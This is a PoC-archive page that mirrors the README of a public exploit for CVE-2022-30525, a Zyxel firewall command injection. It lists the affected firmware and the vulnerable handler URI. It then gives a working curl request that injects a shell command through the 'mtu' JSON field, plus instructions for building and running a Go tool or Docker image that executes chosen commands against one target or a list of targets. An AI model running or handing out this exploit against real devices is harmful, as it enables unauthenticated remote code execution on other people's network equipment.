Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2022-30525 PoC — 合勤科技 USG FLEX 操作系统命令注入漏洞

Source
https://github.com/iveresk/cve-2022-30525
Associated Vulnerability
Title:合勤科技 USG FLEX 操作系统命令注入漏洞 (CVE-2022-30525)
Description:A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
Description
Initial POC for the CVE-2022-30525
Readme
# CVE-2022-30525 by 1vere$k
**Rapid7** discovered and reported a vulnerability that affects Zyxel firewalls supporting Zero Touch Provisioning (ZTP), which includes the ATP series, VPN series, and the USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, identified as CVE-2022-30525, allows an unauthenticated and remote attacker to achieve arbitrary code execution as the nobody user on the affected device.

The following table contains the affected models and firmware versions.

Affected Model	
USG FLEX 100, 100W, 200, 500, 700 ZLD5.00 thru ZLD5.21 Patch 1
USG20-VPN, USG20W-VPN ZLD5.10 thru ZLD5.21 Patch 1
ATP 100, 200, 500, 700, 800	ZLD5.10 thru ZLD5.21 Patch 1
The VPN series, which also supports ZTP, is not vulnerable because it does not support the required functionality.

The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the `nobody` user. This vulnerability is exploited through the `/ztp/cgi-bin/handler` URI.

## Curl Example 
```
curl -v --insecure -X POST -H "Content-Type: application/json" -d
'{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
https://192.168.1.1/ztp/cgi-bin/handler
```

## Usage

There should be a `cmds` file created where you can add commands to be executed via the program in the next format:
```
bash -c "command#1 && command#2 && etc."

For example:
bash -c "ping 8.8.8.8"
```

**Golang**
```
1. git clone https://github.com/iveresk/cve-2022-30525.git
2. cd cve-2022-30525
3. go build cve-2022-30525.go -o /cve-2022-30525
4. chmod +x cve-2022-30525
5. ./cve-2022-30525 -t <targetURL> [or <targetFile>]
```

**Dockerfile**
```
docker run -it -e INPUT_FILE=<file_name> masterrooot/cve-30525
```
Where is INPUT_FILE is a target URL or file with list of targets.

## Contact
You are free to contact me via [Keybase](https://keybase.io/1veresk) for any details.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →